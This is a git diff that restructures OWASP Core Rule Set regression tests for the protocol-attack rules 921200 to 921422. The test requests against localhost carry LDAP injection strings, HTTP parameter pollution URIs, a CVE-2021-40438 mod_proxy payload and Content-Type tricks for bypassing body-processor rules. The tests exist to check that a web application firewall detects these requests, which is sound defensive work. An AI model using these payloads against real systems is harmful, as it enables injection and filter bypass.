headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=printer)(uid=*)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-6 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=printer)(uid=*)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 6 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=void)(objectClass=users))(%26(objectClass=void)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-7 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=void)(objectClass=users))(%26(objectClass=void)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 7 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=eb9adbd87d)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-8 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=eb9adbd87d)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 8 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)!(sn=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-9 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)!(sn=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 9 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=*)(uid=*))(|(uid=*" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" - - test_title: 921200-10 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=*)(uid=*))(|(uid=*" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" + - test_id: 10 desc: "Testing for rule, this should trigger" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - data: "foo=aaa*aaa)(cn>=bob)" - uri: "/" - port: 80 - version: "HTTP/1.1" - output: - log_contains: id "921200" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + data: "foo=aaa*aaa)(cn>=bob)" + uri: "/" + port: 80 + version: "HTTP/1.1" + output: + log_contains: id "921200" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml index 78b250c06..44347f128 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml @@ -2,51 +2,47 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921210.yaml +rule_id: 921210 tests: - - test_title: 921210-1 + - test_id: 1 desc: "HTTP Parameter Pollution via bogus chars after parameter array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a=bar&foo[1]b=" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a=bar&foo[1]b=" + version: "HTTP/1.1" + output: + log_contains: id "921210" + - test_id: 2 desc: "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1]a[2]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921210" - - test_title: 921210-3 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1]a[2]=bar" + version: "HTTP/1.1" + output: + log_contains: id "921210" + - test_id: 3 desc: "HTTP Parameter Pollution false positive test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?foo[1][2]=bar" - version: "HTTP/1.1" - output: - no_log_contains: id "921210" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?foo[1][2]=bar" + version: "HTTP/1.1" + output: + no_log_contains: id "921210" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml index 6f260a6b0..e5b4235e0 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml @@ -2,22 +2,20 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Parameter Pollution" - enabled: true - name: 921220.yaml +rule_id: 921220 tests: - - test_title: 921220-1 + - test_id: 1 desc: "Potential HTTP Parameter Pollution via parameter array" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get?foo[1]=bar" - version: "HTTP/1.1" - output: - log_contains: id "921220" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get?foo[1]=bar" + version: "HTTP/1.1" + output: + log_contains: id "921220" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml index dbe32ad8b..ad2d3659f 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml @@ -2,22 +2,20 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Range Header" - enabled: true - name: 921230.yaml +rule_id: 921230 tests: - - test_title: 921230-1 + - test_id: 1 desc: "Submit HTTP Range Header, forbidden at PL3 by default" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Range: 1-2 - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921230" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Range: 1-2 + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "921230" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml index 314f48f32..8272c730a 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml @@ -2,36 +2,33 @@ meta: author: "Franziska Bühler, azurit" description: "Rule against CVE-2021-40438" - enabled: true - name: 921240.yaml +rule_id: 921240 tests: - - test_title: 921240-1 + - test_id: 1 desc: "Detect attacks against mod_proxy: CVE-2021-40438" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" - - test_title: 921240-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log_contains: id "921240" + - test_id: 2 desc: "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log_contains: id "921240" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml index de34bd0f5..61c80b4fd 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml @@ -2,198 +2,185 @@ meta: author: "studersi, azurit" description: Test whether the recommended rules can be fooled into using the wrong body processor which can result in bypasses - enabled: true - name: 921421.yaml +rule_id: 921421 tests: - - test_title: 921421-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 6 desc: Negative test for 921421-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 7 desc: Negative test for 921421-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 8 desc: Negative test for 921421-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 9 desc: Negative test for 921421-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 10 desc: Negative test for 921421-5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 11 desc: Negative test for rule 921421-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 12 desc: Negative test for rule 921421-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml index c215da6b9..5d69957ec 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml @@ -2,278 +2,260 @@ meta: author: "studersi, azurit" description: Try to send mime types in different part of Content-Type header - enabled: true - name: 921422.yaml +rule_id: 921422 tests: - - test_title: 921422-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 6 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/html" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/html" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 7 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 8 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 9 desc: Negative test for 921422-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 10 desc: Negative test for 921422-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 11 desc: Negative test for 921422-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 12 desc: Negative test for 921422-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 13 desc: Negative test for 921422-5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 14 desc: Negative test for 921422-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 15 desc: Negative test for rule 921422-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 16 desc: Negative test for rule 921422-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 17 desc: Negative test for rule 921422-9 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 